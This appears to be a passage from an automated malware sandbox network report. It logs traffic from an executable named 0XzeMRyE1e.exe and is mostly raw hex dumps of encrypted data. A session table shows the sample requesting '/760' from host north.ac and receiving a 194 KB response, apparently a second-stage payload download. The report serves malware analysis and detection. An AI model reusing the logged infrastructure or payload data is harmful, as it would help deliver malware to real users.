                                                                              2022-06-01 23:53:42 UTC1121INData Raw: 08 37 fc 89 0a f4 07 06 55 f0 8e b4 57 20 12 87 f0 09 0c c7 08 15 b5 c8 89 16 e6 07 89 fe 06 31 c6 89 ff 97 06 31 c7 8e c9 86 ac 8e d2 c6 2a 06 b8 07 86 f8 07 0e e9 86 2a d0 07 46 0a 26 d9 c6 83 f8 05 76 8e d4 26 dc 46 5b 06 80 51 8b 06 7b 47 8b 06 49 8b 06 51 8b c7 a2 ca 3a ed 0e 86 2f d7 cd 3a f2 08 06 06 ce cd 4b e2 87 5e ef e6 c6 08 4e 5c 06 8f d0 87 c8 8b c5 f9 74 06 87 f0 f5 b7 c5 10 87 f0 a7 c9 08 97 79 6b 3f 47 84 c8 07 08 5d 47 84 07 0d 10 62 cb 08 62 c7 06 db fa 0c 05 46 ba 48 36 8e ee 26 d6 0e 46 ca 8e 6b ce 8e d0 06 36 86 0a e8 07 c9 e3 ce 26 f6 0e c8 06 bd 07 86 fd 07 86 ed 07 06 b6 07 3a 07 2a 07 0e cd 4d 86 13 48 0d c7 09 0e fa 12 86 ce 05 3a 26 ca a7 3a 04 a6 86 86 08 06 0e 4e fb 12 06 e6 07 26 cb 67 40 b9 b9 06 29 a9 0f 0e de a6 79 66 40
                                                                              Data Ascii: 7UW 11**F&v&F[Q{GIQ:/:K^N\tyk?G]GbbFH6&Fk6&:*MH:&:N&g@)yf@
                                                                              2022-06-01 23:53:42 UTC1137INData Raw: 4b d9 26 e3 8e f9 26 ca 01 36 19 66 f4 36 ee 23 66 c9 72 c7 19 66 fb 36 ee 8e dc 66 68 26 a0 ed e8 97 46 18 a8 53 26 f4 98 a0 86 98 66 75 e6 0e f8 0e f2 36 67 9b 06 67 e6 26 bf e8 9b d7 36 c6 77 7c 1a c7 31 bf a7 35 e3 cd 18 82 a6 2c 16 25 2c b7 76 76 25 2a b7 97 56 25 8f 0e a7 77 1a 91 13 87 1a 06 8f c8 87 f0 f4 ee 30 86 06 87 c8 7c fa 4e 5f 87 c8 c7 b8 06 f0 c0 26 be 90 58 88 87 06 c7 e6 06 1f 01 a8 87 f0 09 08 b7 06 06 15 b5 c8 89 e6 07 89 fe d7 56 1c c6 89 ff 56 1c c7 06 4d 58 1c 8b 89 17 ca 46 72 e8 8e 5b d7 d8 a6 89 96 11 68 57 8e d3 26 fb 0e d6 60 04 d6 b8 16 e6 66 59 07 d6 7b 59 09 66 17 76 b1 17 f6 ae fb 36 f5 69 0a d9 36 f1 e2 26 d9 a6 1b b7 a4 29 76 ee 26 76 36 2c 18 d6 f9 07 e8 36 f6 b3 8e 5b d3 b5 47 56 97 5b 48 6b 67 78 06 69 78 e0 36 0f 0d
                                                                              Data Ascii: K&&6f6#frf6fh&FS&fu6gg&6w|15,%,vv%*V%w0|N_&XVVMXFr[hW&`fY{Yfv6i6&)v&v6,6[GV[Hkgxix6
                                                                              2022-06-01 23:53:42 UTC1153INData Raw: 02 91 0e 06 89 ff 05 7a 4a 89 ff 04 06 7a 45 90 5a 25 0a fc c8 06 07 7a 3c fc c8 0e 7b 11 36 57 05 1b fe e6 a3 86 19 29 91 06 cd 91 d5 89 e6 45 c7 ff 16 0c 71 d6 3e 86 0c 09 1a 93 07 e7 1a 91 06 8f 48 1e 90 4a 26 25 0a 8e 48 2e a6 08 4d 89 8a c6 0a 06 15 41 04 7b b0 a8 23 0f 88 ac 39 05 8e 0d f6 3e 09 3a 87 28 0d 89 84 1e 05 7a 12 a6 06 06 04 7a 0c 86 54 2e 86 f1 06 7f 91 cd cc 4c 2e 87 89 86 ee 06 7a 16 89 ee 07 86 c4 06 ee 07 70 fa f1 0c 70 fb a6 f1 08 70 fc 5e a6 24 22 a6 24 06 91 de 89 01 05 7a 13 8b 16 e1 7a 0f 59 a9 19 f1 08 39 08 c6 26 1a 22 15 bc c6 8f 64 26 1e 89 fe 08 7b e7 0f 46 f1 46 2f 89 fe 09 7b 2a 46 07 0e 4a f1 24 07 08 cd 4c 1e e7 38 a7 0c 9e 66 26 e6 0b 10 91 0a be cd 0a 46 16 47 08 4d 89 05 09 15 92 8b 5d 26 07 67 ac 05 1b de a6 10 4a
                                                                              Data Ascii: zJzEZ%z<{6W)Eq>HJ&%H.MA{#9>:(zzT.L.zppp^$"$zzY9&"d&{FF/{*FJ$L8f&FGM]&gJ
                                                                              2022-06-01 23:53:42 UTC1169INData Raw: fa 06 0e 67 06 fe 87 27 42 41 5a 8b ee 78 1d 36 17 86 08 8f 1d 89 2c 06 89 76 24 46 fd e0 21 d8 29 d9 46 1b 0d 2e 5c ee 50 b6 2e 5f 26 4c 65 64 66 39 d3 61 ee 06 c6 34 56 22 13 06 76 c2 5e 06 89 ff 04 7b 1e 11 ee 6a 57 30 f8 06 39 c6 89 a2 ff 05 e6 1a 5a 2f 6e 72 05 3b f7 07 4e 05 1b 9a c6 56 91 f6 16 22 33 07 e9 56 89 fe 0c 7b 28 ee 47 c5 07 31 06 83 97 70 15 09 06 09 26 63 63 86 84 56 56 56 70 09 26 06 6e 96 08 46 56 6e 5a ca 58 f6 07 aa 46 0a a9 0f a7 08 c9 a7 18 0f fe 05 7a 12 a6 89 fe 04 7a 0d 96 5d a6 b6 07 29 9c 30 37 38 89 04 04 46 38 1c c9 67 a6 2f 26 06 ee 01 06 3a 89 61 f1 06 67 8b fc 7e 4b 41 3b 4e 2f 46 2b 79 43 16 3d dc 17 1d 00 0c 46 71 ce 3e 91 0a 9b c7 5e fc 46 4a 0e 2e 07 7a 28 06 47 8f 66 7b fe 8f 4b fa c6 4e 66 58 8f 1a 7b f6 36 48 fa
                                                                              Data Ascii: g'BAZx6,v$F!)F.\P._&Ledf9a4V"v^{jW09Z/nr;NV"3V{(G1p&ccVVVp&nFVnZXFzz])078F8g/&:ag~KA;N/F+yC=Fq>^FJ.z(Gf{KNfX{6H
                                                                              2022-06-01 23:53:42 UTC1185INData Raw: c6 07 69 d2 0f c9 30 69 48 09 c9 85 00 68 c8 08 53 c6 2e cd 38 c9 08 49 07 c7 41 64 77 c8 07 c7 09 c7 37 47 09 70 c8 3a 70 01 c6 16 cb 24 06 46 0d c7 42 47 07 c9 08 07 06 b0 74 c8 7c 74 48 09 79 46 28 70 4c 09 fd c7 09 c7 86 49 09 74 c6 27 cf 0f 47 1d cb 0f 63 c9 7e 73 48 09 c7 5b cd 28 70 48 09 6c f5 c8 23 47 07 c9 08 cd 3f 6a 48 09 cb 42 c7 08 c0 77 46 7c 80 48 43 cf 0f 49 09 7c c6 3c b0 33 46 07 74 c8 3a 7b c8 07 50 ca 07 01 49 13 49 07 72 c8 b3 47 0b c7 27 47 0a 49 07 b1 cf 0b c7 8e 33 46 07 76 d2 0b 68 ca 21 95 c7 3d d5 11 d5 0b 29 14 5b 06 60 a6 06 20 52 f4 14 47 f4 08 e9 0e 59 06 56 01 f2 08 e9 14 48 26 0c f7 0b f5 08 e9 31 a9 07 fc 53 a6 29 e7 06 73 68 3f a7 06 69 07 e9 62 05 e9 06 e7 90 67 49 69 09 e9 4a 67 07 e7 09 6b 07 e0 68 6e 07 73 68 64 6b
                                                                              Data Ascii: i0iHhS.8IAdw7Gp:p$FBGt|tHyF(pLIt'Gc~sH[(pHl#G?jHBwF|HCI|<3Ft:{PIIrG'GI3Fvh!=)[` RGYVH&1S)sh?ibgIiJgkhnshdk
                                                                              2022-06-01 23:53:42 UTC1201INData Raw: f9 60 05 b6 2a 46 29 b6 5a 5e df dc 19 91 0e 86 de 80 4f ab 08 7a 86 f9 67 06 bc 1e ea 04 6c 36 96 64 07 d8 06 e5 5b 6e 08 00 b5 9e 0a 14 b5 39 7b 32 a2 96 c2 e6 0a 9f c0 f9 6e 37 af b4 59 fe 0e 97 a7 29 19 c2 43 d8 6c 36 16 6d da f1 72 79 5d 3e 44 53 26 7b ae b9 59 af 79 4f 85 eb 46 5e cc a1 eb 84 54 79 1e c5 86 f3 30 0d 7a 86 ad 34 f9 1a 06 1f 02 59 b2 88 df d9 4c 07 b9 2a 5e 4d e5 d0 bf e9 cc 0a 4f d5 59 b2 79 c5 b2 35 28 0e a5 d0 08 d9 37 ae 75 6d 45 0e 52 0b 71 f9 1a aa ce 1d 79 16 22 00 18 5a 99 a9 94 91 32 46 12 c2 95 02 56 f3 d8 06 0e 86 d7 75 a0 ad ef 73 37 99 39 06 5c 1f c5 73 3e 33 ac 4d 08 0a 99 d3 02 11 8c 83 97 72 08 66 19 4b 65 99 11 20 6c b4 0e 89 57 3f 59 34 2d 79 bc 9b 0e 07 37 e3 39 2e 3d 95 b9 d8 16 a5 66 43 78 b9 69 f3 e0 3a 46 e7 3b
                                                                              Data Ascii: `*F)Z^Ozgl6d[n9{2n7Y)Cl6mry]>DS&{YyOF^Ty0z4YL*^MOYy5(7umERqy"Z2FVus79\s>3MrfKe lW?Y4-y79.=fCxi:F;
                                                                              2022-06-01 23:53:42 UTC1217INData Raw: 7f e7 f9 0e f9 92 c1 99 63 2d 82 af 33 26 ce 5b 87 cf 94 39 7b fe 04 26 f1 2a ee 2b e6 79 48 96 98 86 ea 6a 54 58 a5 bd 5f 99 a2 86 61 ad d9 b9 42 7a d4 99 0f 06 27 76 05 f4 75 21 57 6f 08 02 d8 06 32 d3 4a 7f f6 83 0e 7d f2 92 99 6a 15 79 be 77 0e c0 f7 73 d9 6f 7d 1c ee 73 16 08 31 8c 65 99 0f 95 3e e6 46 e8 a0 fe 45 ad bd d8 06 2e 86 57 98 bb 9a e0 64 8f f9 21 06 4c 88 6a 77 1a 97 1e 32 08 60 d8 06 bb 39 ba af eb f5 0e 18 f3 65 d8 06 f2 06 d3 1f 16 ad 6e 6b 9e d9 a7 27 d3 fd 46 a5 47 23 13 5d 6a d8 06 a3 86 d0 bd 99 e7 d5 ed 7e 19 13 06 42 36 de a0 15 d9 de 12 08 91 d8 06 e5 a2 1f 3f 3c 8b 0a 8b 64 f9 0c be e2 60 7d fe 0e e2 81 f1 19 36 a4 62 6c 2e 16 f2 29 7d 03 39 82 e5 4d df 46 50 7c 82 45 99 f0 79 72 ac 86 6f fc fa fe 5c 70 39 39 20 86 5b 1d 92 2b
                                                                              Data Ascii: c-3&[9{&*+yHjTX_aBz'vu!Wo2J}jywso}s1e>FE.Wd!Ljw2`9enk'FG#]j~B6?<d`}6bl.)}9MFP|Eyro\p99 [+
                                                                              2022-06-01 23:53:42 UTC1233INData Raw: 86 fc 09 88 34 b2 4d 25 29 89 06 00 95 38 43 52 58 90 50 07 29 ba ac 40 ab c2 4e 7a 0e 07 e9 36 2c ed 41 a0 f9 63 b4 08 e4 69 64 3b 6a c0 c5 87 ac 0e 18 85 1e 69 b8 f5 fe 82 98 16 6c fb de 52 a8 07 20 e9 11 46 dc e8 75 11 cb 19 a8 07 a1 06 86 cc 00 1d 46 0f df f1 07 e9 4b db 25 dd 07 85 00 2e 07 69 5d f1 10 b1 f2 c0 09 61 0a 86 aa a8 07 92 8d 40 f8 79 0e b9 ea 44 a9 c4 8b dc 79 dc 26 06 63 eb 64 16 a8 07 cc e7 46 2b 21 2a 7e 79 bd 69 80 a3 06 60 c2 c5 f8 4d 46 02 97 07 a8 07 67 0a ca 46 fd 35 ee 0a 7e 07 a8 07 a4 92 5a 88 bd 0e 13 38 2e e9 52 b2 01 99 12 16 66 0f f3 5f a9 46 57 a2 ed 46 71 f0 68 04 ea a2 a8 07 49 86 ba 8e ec 2f d9 01 7b 29 35 06 3d f8 59 1f 5c 68 a2 0e 07 99 71 60 11 6c 88 24 1b 75 0a 57 21 d8 06 ff fa 56 b4 86 0e 03 b8 1f d9 06 eb 31 04
                                                                              Data Ascii: 4M%)8CRXP)@Nz6,Acid;jilR FuFK%.i]a@yDy&cdF+!*~yi`MFgF5~Z8.Rf_FWFqhI/{)5=Y\hq`l$uW!V1
                                                                              2022-06-01 23:53:42 UTC1249INData Raw: a9 46 78 7a a8 60 b5 59 a8 07 60 06 ad 8c 95 6f ac 59 cf 34 07 a8 07 ce 10 70 27 cf 2c 93 0a b3 d2 69 56 f1 2c 18 1a 32 0e 13 08 c3 a9 70 7e ab 7d 9b 16 bf b6 85 a2 29 74 1c 0f f6 26 0b 74 05 9c 8c a8 07 ac a9 86 22 23 fc 40 91 f6 8b a8 07 06 d9 b6 6b 0d c5 fb e1 1a 07 29 35 da 36 91 7d c6 ef 9b 0a a1 29 a8 07 3b 93 e3 1d e7 16 42 9e 5b 28 e9 6e 95 ec a6 16 09 b8 d2 cb e9 0c 65 fe 8f 46 13 47 77 6b 81 65 29 20 be 86 28 6d 34 86 4c ed 8e a8 07 06 f9 90 4a fb 37 83 56 ee 08 c6 a8 07 f8 f1 52 5b 7d c6 0e c2 cf e5 a9 5b 32 1b 59 4e 0e 86 29 15 69 72 d5 12 74 d0 26 fe 84 cd 7d 2a a8 07 f7 bd 86 55 96 b7 59 11 32 7e a8 07 06 14 16 a7 b1 48 c9 f0 d3 08 57 c9 5b cb 34 e8 bc 8c 6f 0a 8c c5 69 25 96 25 8a 02 d3 0e 7e dd ac a8 07 77 9b c9 c1 16 54 67 fd 55 a9 3f 15


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              3 | 192.168.2.4 | 49782 | 172.67.152.230 | 443 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              2022-06-01 23:53:55 UTC | 1632 | OUT | GET /760 HTTP/1.1
                                                                              Host: north.ac
                                                                              Connection: Keep-Alive
                                                                              2022-06-01 23:53:56 UTC | 1632 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 01 Jun 2022 23:53:56 GMT
                                                                              Content-Length: 194560
                                                                              Connection: close
                                                                              Last-Modified: Thu, 26 May 2022 04:23:16 GMT
                                                                              Accept-Ranges: bytes
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5qfytIOe5sLD%2Fwl9gYzk58E9Fw4svHfvVEAnmoKBb2GQNLh3PNJ2dfK0hWDqJbvF473Vs9oG74D2O6ZrWYDws8pGaq5HxPESBkuf4TGyPz%2B08px9Ua6%2FS9tmsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 714bdf1c5fa2769e-LHR
                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Data Ascii: %%$$%%####$"GG(K6%%m" ##(K421vvo 4 VjHhjr@hv%#gjHh
                                                                              2022-06-01 23:53:56 UTC1643INData Raw: f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 09 fd 09 04 18 f8 28 f8 f8 17 38 67 6c f8 f8 fe 0b 06 fd 25 ff 09 06 0e f6 f9 23 f9 0e 0b 07 0f 0b 08 09 07 0b 1c 09 1c 24 1b 0f 0b 08 76 0f f8 f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 0e 09 04 18 f8 28 f8 f8 17 38 67 6c f8 f8 fe 0b 06 09 06 0e f6 f9 0b 09 09 09 0b 1d 09 1d 24 fe 6b 87 f8 f8 02 72 76 0e f8 f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 09 06 fc 09 05 0a 01 67 68 f8 f8 fe 0e f6 f9 0b 0a 09 0a 0b 1e 09 1e 24 fe 6b 87 f8 f8 02 72 09 fc 18 f0 f8 f8 f8 ce 0b 0b fc 09 fc 14 ce 20 3b f8 f8 fe 0b 0c 09 0c 0f d2 0b 0d 0e 0b 1f 30 aa f8 f8 f8 fc 09 0b 17 04 ce 20 3a f8 f8 fe 0b 20 fc 09 0b 17 08 ce 20 3a f8 f8 fe 0b 21 fc 09 0b 17 0c ce 20 3a f8 f8 fe 0b 22 09 21 0e f6 fb 0b 23 09 23 0b 24 09 24 24 61 09 21 0f d2 0f ce 85 4b f8
                                                                              Data Ascii: ws(8gl%#$vws(8gl$krvwsgh$kr ;0 : :! :"!##$$$a!K
                                                                              2022-06-01 23:53:56 UTC1644INData Raw: 18 f8 f9 f8 f8 0c 0c 0f 85 f9 f8 f8 f9 1d 0e fe 9a 20 5d f8 f8 02 6c fa f8 f8 13 13 32 7d f8 f8 f8 1e 20 ff f8 f8 02 ff 67 00 f8 f8 02 6a bb 73 f8 68 67 01 f8 f8 02 0d 25 6a 1e 00 6a e5 73 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 67 02 f8 f8 02 0f 85 0d f8 f8 f9 1d 0e c8 ff f8 f8 13 20 10 f8 f8 02 9a 67 94 f8 f8 02 14 25 3c 1e 01 0c 0f 85 f9 f8 f8 f9 1d 0e fa fb 20 56 f8 f8 fe 84 30 f8 f8 f9 9a 67 03 f8 f8 02 9d ff f8 f8 13 16 25 1a 1e 12 31 45 f7 f7 f7 09 fc 22 02 30 3c f7 f7 f7 02 30 43 f7 f7 f7 03 30 6e f7 f7 f7 04 23 84 05 23 b2 0b fc 23 d3 f8 f8 16 fa 20 7e f8 f8 02 22 16 fa 20 7e f8 f8 02 22 fb 28 fb f8 49 f8 f8 f8 f8 f8 f8 f8 6a 21 74 f8 68 6a 4e 48 f8 68 20 57 f8 f8 fe 6a 2d 74 f8 68 6a 4e 48 f8 68 20 57 f8 f8 fe 20 fd f8 f8 23 78 0c f8 f8 fc 6a 3c 48
                                                                              Data Ascii: ]l2} gjshg%jjsh %g g%< V0g%1E"0<0C0n### ~" ~"(Ij!thjNHh Wj-thjNHh W #xj<H
                                                                              2022-06-01 23:53:56 UTC1646INData Raw: f8 f8 f8 f9 f8 f8 f9 f8 f8 f8 f8 f8 f8 f8 f8 18 f9 f8 f8 18 f9 f8 f8 00 f8 f8 f8 f9 f8 f8 f9 0b 28 00 f8 cb f8 f8 f8 1c f8 f8 09 0e 10 32 a5 f8 f8 f8 1e 76 6b f8 f8 fc 76 6e f8 f8 fc 20 de f8 f8 fe fb 20 db f8 f8 fe 0d 32 8f f8 f8 f8 1e 0e 62 0e 31 8c f8 f8 f8 1e 23 53 fa 00 fa 86 61 62 55 cc 76 d7 f8 f8 fc 76 d5 f8 f8 fc fa 00 fa 86 61 62 55 cc 89 ff 00 ff 86 61 62 55 cc 89 59 20 80 f9 f8 fe 76 d6 f8 f8 fc fa 00 0f 62 50 fa 86 61 62 55 cc 89 20 83 f9 f8 fe 51 18 f8 f9 f8 f8 50 18 f8 f9 f8 f8 55 20 86 f9 f8 fe 94 00 0f 62 50 0e 24 35 1e 00 fa 86 61 0f 51 62 fe 0f 50 66 52 f6 fa 0e f6 f9 16 25 23 1e 01 25 85 07 f8 fa 86 61 0f 51 0e 24 18 1e 1e fa 0b fc 09 fc 22 02 30 46 f7 f7 f7 03 30 5c f7 f7 f7 04 30 5f f7 f7 f7 04 23 b9 05 23 cb 20 02 f8 f8 23 23 d3 f8
                                                                              Data Ascii: (2vkvn 2b1#SabUvvabUabUY vbPabU QPU bP$5aQbPfR%#%aQ$"0F0\0_## ##
                                                                              2022-06-01 23:53:56 UTC1647INData Raw: 0f 51 0b fd 09 fd 0e 27 b0 77 3e f8 f8 fc 09 fc 18 f9 f8 f8 02 50 20 9c f8 f8 02 20 9d f8 f8 02 6c 0e f8 f8 f9 0b 00 d6 fe 1e d5 3b f9 f8 f8 09 00 67 9e f8 f8 02 24 12 ff 67 9f f8 f8 02 09 00 20 a0 f8 f8 02 0b 01 d5 10 f9 f8 f8 1e d5 18 f9 f8 f8 09 00 67 a1 f8 f8 02 0b 02 09 02 86 61 0f 50 0b 03 09 03 85 0d f8 f8 f9 0b 04 09 04 0e c8 f9 f8 f8 f9 20 10 f8 f8 02 9a 0f 0b 05 23 15 09 04 09 05 09 02 09 05 0f 51 92 67 a2 f8 f8 02 9a 09 05 0f 1d 31 82 f8 f8 f8 50 0b 05 09 05 09 03 2a d5 76 93 f8 f8 02 09 00 67 a3 f8 f8 02 09 04 fe 0f 6b a4 f8 f8 02 0b 06 09 06 67 a5 f8 f8 02 0b 07 09 07 76 a6 f8 f8 02 67 a7 f8 f8 02 09 03 0f 29 04 09 07 76 a8 f8 f8 02 67 a7 f8 f8 02 09 03 10 29 04 09 07 76 a9 f8 f8 02 67 a7 f8 f8 02 09 03 11 29 04 09 07 76 aa f8 f8 02 67 a7 f8
                                                                              Data Ascii: Q'w>P l;g$g gaP #Qg1P*vgkgvg)vg)vg)vg
                                                                              2022-06-01 23:53:56 UTC1648INData Raw: 1d 0f 50 04 89 17 08 5a 50 76 43 f8 f8 fc 00 1d 0f 50 04 89 16 5a 50 76 43 f8 f8 fc 00 1d 0f 50 04 89 50 03 76 5e f8 f8 fc 76 e3 f8 f8 fc 76 6f f8 f8 fc 20 de f8 f8 fe 76 43 f8 f8 fc 00 ff 20 9b f9 f8 fe 20 c3 f8 f8 fe 0b fc 76 a6 f8 f8 fc 76 e3 f8 f8 fc 76 6f f8 f8 fc 20 de f8 f8 fe 09 fc 0e 09 fc 86 61 20 9b f9 f8 fe 20 2c f9 f8 fe 0b fd 76 45 f8 f8 fc 24 0a 76 44 f8 f8 fc fa 09 fd 67 bd f8 f8 02 d6 fb 1e d6 f8 09 fd 0b fe d6 01 1e 0e 25 fb 0c 0b fe d6 f8 09 fe 22 08 f8 30 cd f6 f7 f7 03 30 e9 f6 f7 f7 04 30 eb f6 f7 f7 04 30 f8 f7 f7 f7 05 30 fa f7 f7 f7 03 30 05 f7 f7 f7 f8 f8 f9 14 f8 f8 f8 f8 09 f9 07 18 f9 fb f9 f8 f8 f9 f8 f8 b4 f8 65 21 f9 01 f9 f8 f8 f9 13 28 fd f8 f6 f8 f8 f8 24 f8 f8 09 6a 16 48 f8 68 78 41 f8 f8 fc 6a 67 76 f8 68 78 42 f8 f8
                                                                              Data Ascii: PZPvCPZPvCPPv^vvo vC vvvo a ,vE$vDg%"000000e!($jHhxAjgvhxB
                                                                              2022-06-01 23:53:56 UTC1649INData Raw: 23 f0 f8 32 17 6e 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 6f 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 70 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 71 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 72 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 73 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 74 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 75 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 76 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 77 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 3e 18 78 f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 79 f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7a f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7b f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7c f8 f8 f8 14 25 fa 1e 22 20
                                                                              Data Ascii: #2n%" #2o%" #2p%" #2q%" #2r%" #2s%" #2t%" #2u%" #2v%" #2w%" #>x%" #>y%" #>z%" #>{%" #>|%"
                                                                              2022-06-01 23:53:56 UTC1651INData Raw: ae 37 b3 46 49 de f9 5a 6b db b6 a5 51 55 31 75 b9 e6 f5 5f 99 a4 3e bc 49 20 f0 65 47 9e 19 b9 da 18 49 8f e5 83 3f 6d 69 18 04 ea 1d d8 b5 e3 a9 04 12 47 c2 81 5f c6 03 18 a3 d3 7b 9e 76 63 cf 0a 76 a5 18 70 bb 59 61 27 ad 5c 8a 44 36 ce 52 7d 78 44 57 6b f3 67 e9 30 c7 5e fc 49 2d bf b1 19 61 47 5e 71 c9 bf 9a a4 2a f3 a3 b7 7c f6 6f b1 80 c6 3a 98 08 fd 4e 64 59 be c2 95 35 f8 8c 15 6f 6c 09 3d fa bd b0 10 18 39 2d fd 20 91 52 f0 a7 8b b4 e9 df 86 b8 65 48 a6 9b 41 a4 d6 f8 5e 02 f5 81 1b 6f 65 e5 99 c1 92 3e bc a7 14 56 81 d5 d2 a4 b1 75 7d c3 cf af ee 19 85 8e 5b d8 2f 6f 7d ab 6c eb 4c 16 71 f9 96 30 f0 f3 e7 36 d3 1d a8 8f f5 1f a4 fd d9 b3 1c 24 e0 f3 12 e9 c1 5d 8e ea 4a 13 f9 86 4a 55 47 13 aa 62 3e f9 63 ff d5 d9 40 80 3f 03 c6 71 8a 28 c0 df
                                                                              Data Ascii: 7FIZkQU1u_>I eGI?miG_{vcvpYa'\D6R}xDWkg0^I-aG^q*|o:NdY5ol=9- ReHA^oe>Vu}[/o}lLq06$]JJUGb>c@?q(
                                                                              2022-06-01 23:53:56 UTC1652INData Raw: cb 5a ac 96 03 de 37 5d 9e b6 5f 83 8c c7 36 33 91 4d 6a 37 51 9e 97 db d8 51 d7 e3 72 67 2d c2 7d a2 55 a6 c5 b4 eb d0 fb 59 5c 04 e2 c0 72 a1 aa a0 7b 8e 1d 75 4f ff e0 d4 e3 3a 42 74 d8 1f ce b0 85 67 a7 85 53 55 93 67 a0 02 05 7f 43 66 e5 e9 0a b1 8b 86 37 a9 89 5c bf 90 a1 4e 3f c9 fc 69 33 a1 29 e4 a9 7e 54 58 58 37 6a 12 be c1 0f e8 f6 a5 15 c9 12 80 aa b1 9f 04 8f 86 5c 93 b9 af 40 36 09 6e 81 49 73 ae 75 c6 80 4b 3b e3 32 06 7b 03 31 64 e0 d6 c4 cc ab 76 6e c2 38 92 1f 2f ad cd e6 5a 47 7d 02 4a 92 c2 62 86 21 04 9b fe 4c 5f 2e 6b 7a 72 22 3c 94 b7 7c e4 78 ab c1 ee f9 c4 94 9b 8b 46 22 3c 99 ab ad 33 52 f8 30 32 db 28 a2 3a 77 fe 9b 48 a1 ee ac db 8a f8 dd fa 1d 6e c2 7e a5 8f cf 70 0c 25 9b 26 51 4d 47 66 48 89 b6 2f 78 94 ef be b1 6f 3a e9 b0
                                                                              Data Ascii: Z7]_63Mj7QQrg-}UY\r{uO:BtgSUgCf7\N?i3)~TXX7j\@6nIsuK;2{1dvn8/ZG}Jb!L_.kzr"<|xF"<3R02(:wHn~p%&QMGfH/xo:
                                                                              2022-06-01 23:53:56 UTC1653INData Raw: 87 ae ba f9 49 94 0d 42 88 f6 a1 f9 0d 81 fb 85 9d 5d 3f 9e 0e b3 5b e8 65 ec b5 6b ee 51 d4 f5 11 28 a6 92 23 75 a5 b2 c1 e3 6b 57 b2 27 86 9e 96 5a 7f d2 0e e7 37 bd 14 1e 67 c2 65 ae dc 36 8d 26 6d 55 41 bb 48 06 b3 f2 b3 c6 3e 76 e4 70 df df 4b c1 8d 68 e7 37 d3 da ed d8 c1 4f 5b 0f 58 ad d3 15 19 c0 3b bb db e9 b0 95 0b af 8a 13 30 88 2e ef 05 a6 5d 5e 5d 80 82 3d 63 1a f0 72 9e 10 71 b6 29 3e 22 c0 52 c6 2e 63 bb 15 cb 80 a7 d8 3b c2 6b d4 65 0c a7 86 ff 4c 10 f6 12 27 b5 d1 9b a8 76 95 9e ac 1b 34 d6 f6 4b 36 3b 06 8c 91 62 fb 22 6d 9f d3 ce 67 20 5d 59 fe 3c 45 6a 43 23 b0 af bf 76 83 2b 9e 35 59 3e 28 d0 37 63 62 51 fd af 3d ee bb a4 d0 a9 aa 2c f0 c7 e3 fb a8 3a 3f 65 9b d9 4d ee 18 9c 31 aa 38 ef 79 bf 36 83 ed c7 71 7b 70 7a 11 16 44 2e 28 1c
                                                                              Data Ascii: IB]?[ekQ(#ukW'Z7ge6&mUAH>vpKh7O[X;0.]^]=crq)>"R.c;keL'v4K6;b"mg ]Y<EjC#v+5Y>(7cbQ=,:?eM18y6q{pzD.(
                                                                              2022-06-01 23:53:56 UTC1655INData Raw: c0 0a e6 71 40 5e 90 90 d8 5b a8 9a 78 b9 99 85 a3 87 40 ec 1d dc ad 0c ce 0a 56 d9 2d 99 de c7 54 1c ab cf 8c b4 35 cf 1b ca cc 6f 38 d9 50 4b 4d ac bc 13 1f 7a 32 ac b3 d5 1d ee 4e 84 19 a4 22 25 89 78 8d 39 3b b4 47 cd e3 63 bc 6a 5d 7a 39 56 fc 2f 0f 3c 74 b1 bc fb b1 34 0d 04 f4 61 bc 7a c2 69 81 5a 87 bb 35 0d d3 e4 73 d7 c1 3e bc 0f 5f 84 79 e1 83 81 19 db 67 b8 0a 4d 2d 91 30 1f 90 24 28 0f ac a2 81 70 fd 33 ae 30 ee 54 3e e9 f2 b6 d7 fc 00 09 fe bd 2e e0 10 c6 08 22 a1 b5 1c 36 6b 2e e5 11 1c 7b 28 03 d6 5f f3 56 d9 27 ff f1 06 72 30 39 0a 11 e2 7c 7b da 8d dc 69 59 f2 ff cd 6e 6d 41 55 58 31 91 cc 23 68 6c 0c 4f 91 1b 03 1f 19 0e e0 2a b8 3d 54 30 ac 53 14 f1 3e 3f 90 db 96 66 8d 1c d0 ca f9 d4 05 a9 49 8f e1 03 b1 1e f4 11 7e a5 03 4f 81 b9 4b
                                                                              Data Ascii: q@^[x@V-T5o8PKMz2N"%x9;Gcj]z9V/<t4aziZ5s>_ygM-0$(p30T>."6k.{(_V'r09|{iYnmAUX1#hlO*=T0S>?fI~OK
